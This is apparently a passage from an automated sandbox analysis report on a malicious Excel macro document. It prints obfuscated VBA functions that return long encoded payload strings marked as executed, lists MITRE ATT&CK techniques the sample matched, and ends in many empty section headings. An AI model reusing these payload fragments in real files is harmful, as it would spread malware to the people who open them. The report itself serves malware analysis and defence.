33	Col10LNn = "ap56gB8gJYTQ1uoNwuFuYJdxKn05pqHQrgqkr41262jMlka7ZTsYTNuSJmhSxxIPG4k+OTEHh+T/MZzy5lP3AyvrCVapeFHpWMQDCME28YNUECRaNIlB2RFwzAoCaDlLD2PcuPZtQbZoUdGKa6iH2n0fW5SA5iH3+RwFpMU/ADiJjHMGTxz+zh+2oJoCtWBhiYjEAZ30OdNMwP6Un/YrAmm2HdkpPsi+VVbF7V0lahrqCtUjyohPN5wTVFFukYNi4jeXRuyXmlGiUwBUNKulNPVhP2CnsQjgMEUTAHlWIfBTfVas5VXjUykX5bTd3goRxkwqsuboxjqQtpWALlt6fCbmDcrbPR1Kgll5w45J+pshaJoAhaiQ6tWH4vsqnL8UVSzROPCQlV8lFx0xDvpTAQ5HiHudRtBWAc5lUhS2flAsysaWEEohEwDFD7KO+4ZLFVTyAvw9qyRsln2sf1g7pBbp09ICm6ygH4cOi1jfhncVEG3ZeVed7o3EdH6HONXOoditjsgmdtqZNoiX5v0kQdwVHrkcgoP4a3aTXG3H8SCMwTcVINJEkzZZxliiuP24uGW7KTwlxfwn+DwKF3j1DtW1Mao5Khi8cDMVyLxSSPWFIbpwVbiW5FDikLPlfIy86vM7o4WCaso7IIS7F3mkH6kOgN0Wc1IcHVJPEn/TmcV96/YYFJHbYRKlo/y6Qh0S+/kxsSqhjZbXW/qyRLskamm+wTcqdphpkqtQGGzyATLkTfu44rwusSyUFita11ICOuqMVh7WoNX4Ua4ZRnqAppEMVRDdPu0hBolUYhUIXRQ584UdW0J5zBJjJCEJWpbBk9z6aUq0z2osOaKvOhTIRFRgqAgv5VjohNRw5VR+9Att0Eyo180q2V+wFm7vMM2DZJvDkOXKlgUk81uTUYyi9OfY50HamQFuTJZv7OoYJvAqHdnQdob9rohhYaIuClSGQK2D1G9WLUVFlMd"	executed
34	End Function

Function BraFalse, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"LtuenKKqSKhEn5pDMHFzJcUfTjsTJFXk+2yG5GME1wgq6ldzFq3X0dmCwx3AZcAzEqL42h/DDhRclIr3Fdreafst99TAE8iSGKY5M7ADkZfQrcL0fhtZKVJdlpQmpwPPaPNkIYbRzb5fdCjcaDOdZtG5AlJtr3lai/jMkdjaoDs0gSqyjnLEUEd3no4H0vGSjiF9bMpjk4HrS751S5W3+eOtQyKsaDotNxeIKFbySj9DRMJecmOiJe3eeh9q3eyJxOkJo9OsboOs5a6OyPHQQeHTzIQlmsEpGn3iyy4ucW9yESUtYEBHqp7p+mQfURtKu6MfLJZgLeFWjrt2xICEQSFjTHdg1D6iPhUtlxm9EVcP/ZEkkptO18bmLs4jhtwdSV6RT0om/z9hCBMHW4cBXzFXA3f0092cJh9n/OFwnFENMTKasxEbiMxiUdfMqFbcxlUaJ5EqG+4EsI3AXjPTyeNiYLjkJDREySwfoqeq9URkkFGq4T/ItX5ZUWXmayISymRGkh/rpM0S9gIMyDjhA2FLqq6yZcwyZUaI0b719LLzfUAybSjLSQFmox8ERwUjK7F6edSSid1HcZFOxzha4RIJrjVfmjA5O42B4R+HnVgz67furEgu1qCpMX06OkxthZU+8oEmbcEpwx3eZusQfCcNDMPhsR5Ykd/AlUESdAQrNCR7wqLGoIgFyDs3VJFaxI0j6g+hkaeRsahSlwT3isTYLxOoOHNqhAL8N9FmtrvfioO5RSyNt6vB4A1B6C2nphEpn6JpSNaQC0L7S2awkmhXjEOK+zfNqCIXZLI5SbmrRRbjSYZFdtv4UWeK/qd3uopHqt8amshtqUflyfCwwVJzmL2lgJ5QTGwEV3c8KZOv4XqMW956YUynuWGa1Nzs6M0WnVFFXz85kOlDgNn7oFo74UNibjotFdoQjcK4rH7r2bQQX5W6CMFxIuBAoWkgpW6VO9"

Line	Instruction	Meta Information
35	Function BraFalse()
36	BraFalse = "LtuenKKqSKhEn5pDMHFzJcUfTjsTJFXk+2yG5GME1wgq6ldzFq3X0dmCwx3AZcAzEqL42h/DDhRclIr3Fdreafst99TAE8iSGKY5M7ADkZfQrcL0fhtZKVJdlpQmpwPPaPNkIYbRzb5fdCjcaDOdZtG5AlJtr3lai/jMkdjaoDs0gSqyjnLEUEd3no4H0vGSjiF9bMpjk4HrS751S5W3+eOtQyKsaDotNxeIKFbySj9DRMJecmOiJe3eeh9q3eyJxOkJo9OsboOs5a6OyPHQQeHTzIQlmsEpGn3iyy4ucW9yESUtYEBHqp7p+mQfURtKu6MfLJZgLeFWjrt2xICEQSFjTHdg1D6iPhUtlxm9EVcP/ZEkkptO18bmLs4jhtwdSV6RT0om/z9hCBMHW4cBXzFXA3f0092cJh9n/OFwnFENMTKasxEbiMxiUdfMqFbcxlUaJ5EqG+4EsI3AXjPTyeNiYLjkJDREySwfoqeq9URkkFGq4T/ItX5ZUWXmayISymRGkh/rpM0S9gIMyDjhA2FLqq6yZcwyZUaI0b719LLzfUAybSjLSQFmox8ERwUjK7F6edSSid1HcZFOxzha4RIJrjVfmjA5O42B4R+HnVgz67furEgu1qCpMX06OkxthZU+8oEmbcEpwx3eZusQfCcNDMPhsR5Ykd/AlUESdAQrNCR7wqLGoIgFyDs3VJFaxI0j6g+hkaeRsahSlwT3isTYLxOoOHNqhAL8N9FmtrvfioO5RSyNt6vB4A1B6C2nphEpn6JpSNaQC0L7S2awkmhXjEOK+zfNqCIXZLI5SbmrRRbjSYZFdtv4UWeK/qd3uopHqt8amshtqUflyfCwwVJzmL2lgJ5QTGwEV3c8KZOv4XqMW956YUynuWGa1Nzs6M0WnVFFXz85kOlDgNn7oFo74UNibjotFdoQjcK4rH7r2bQQX5W6CMFxIuBAoWkgpW6VO9"	executed
37	End Function

Function leverpoolS5, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"sOWA1GkgpStTKH2ruEIbpFdfjUdzQt24eoQdqgAbpp3mQ6BFQmpCLiAJdGVjsraMZ0R6t3xf7Ez9PhL85FRFbT41IGyZemmZPm10ncsj4iyIOFlT7oHgLqVAtyiVv1x0HUAg5GDzGL6VgyZXjFKcHnlxEpH7SouUJN+3La8sVtjFCYybMbgk33B1zsWP0q9zzysjUdbVM1OaZbuCUNlWOmPzVTeOt9JjhdD2DEd3Opyjh1sqOV+yY6ZKBanX0xTAigLXdQWI5XhYEoYKpXB0XzXDEdq8nd0V9lSpGpKnT21vyrNfwZtbeyB92/usaAnahjoQSXIuvZRx/62BHJ3DRRjUnXOMNmjb4oS2bsTKrrHcsqE3uGWNzFSeI1pfS3Yb+Oo/MB8bhi+zMgKiR/aOUU73XcppsaGHLU0HrdXmL5ZE7O1xHKcQ9BeRg9PD1M78w7ZK5TKiSg50iiGAi2daoy7ned9TXNP+1Wz/2cee5zzYEyiipawlJzLOo7N0OiRUatwoXyJcpFX1FwdYPRf2cY3E70K9sTnCCpFAEoWly5eViBqftQ1a5Z0f5bNkW3WxnxD39PfaZ0YhU+rRCsHWHOpgxMguQqJgnt1eLhFMCk6un+KpNfEFu3BHdd0YOuqPRW9MaYT/BGzd2jC7teFoumd/RIooWs/tdQ43q6GxmTtbg809jtsner8AcgwXlE9UNAtMNfxRugCq5Kgzz7jCtCjpHh5kh2D7Jp/hUc/TbdHsUOoop9Mk33bMu4DyQZfbmZfUVj73YlsY/bbBDSrec/voFz2jAeZ99KnCV00bkpE23E04s63SHfSXFwKYGXkBbigaZrKe44cLLnfmcUUxyHOQVOj4aq9IXInd01D9tJCWxiNH1+xQUHqxkeFvEkIpovWbDUD8bPzFuagWQLCDQ4I+tgaTakq6aXtJb98dJ1zPhlMs+PazQknLqnQcMGYGbBTYERlxYkf"

Line	Instruction	Meta Information
38	Function leverpoolS5()
39	leverpoolS5 = "sOWA1GkgpStTKH2ruEIbpFdfjUdzQt24eoQdqgAbpp3mQ6BFQmpCLiAJdGVjsraMZ0R6t3xf7Ez9PhL85FRFbT41IGyZemmZPm10ncsj4iyIOFlT7oHgLqVAtyiVv1x0HUAg5GDzGL6VgyZXjFKcHnlxEpH7SouUJN+3La8sVtjFCYybMbgk33B1zsWP0q9zzysjUdbVM1OaZbuCUNlWOmPzVTeOt9JjhdD2DEd3Opyjh1sqOV+yY6ZKBanX0xTAigLXdQWI5XhYEoYKpXB0XzXDEdq8nd0V9lSpGpKnT21vyrNfwZtbeyB92/usaAnahjoQSXIuvZRx/62BHJ3DRRjUnXOMNmjb4oS2bsTKrrHcsqE3uGWNzFSeI1pfS3Yb+Oo/MB8bhi+zMgKiR/aOUU73XcppsaGHLU0HrdXmL5ZE7O1xHKcQ9BeRg9PD1M78w7ZK5TKiSg50iiGAi2daoy7ned9TXNP+1Wz/2cee5zzYEyiipawlJzLOo7N0OiRUatwoXyJcpFX1FwdYPRf2cY3E70K9sTnCCpFAEoWly5eViBqftQ1a5Z0f5bNkW3WxnxD39PfaZ0YhU+rRCsHWHOpgxMguQqJgnt1eLhFMCk6un+KpNfEFu3BHdd0YOuqPRW9MaYT/BGzd2jC7teFoumd/RIooWs/tdQ43q6GxmTtbg809jtsner8AcgwXlE9UNAtMNfxRugCq5Kgzz7jCtCjpHh5kh2D7Jp/hUc/TbdHsUOoop9Mk33bMu4DyQZfbmZfUVj73YlsY/bbBDSrec/voFz2jAeZ99KnCV00bkpE23E04s63SHfSXFwKYGXkBbigaZrKe44cLLnfmcUUxyHOQVOj4aq9IXInd01D9tJCWxiNH1+xQUHqxkeFvEkIpovWbDUD8bPzFuagWQLCDQ4I+tgaTakq6aXtJb98dJ1zPhlMs+PazQknLqnQcMGYGbBTYERlxYkf"	executed
40	End Function

Reset < >

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 1286

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 22684

General

VBA Code Keywords

VBA Code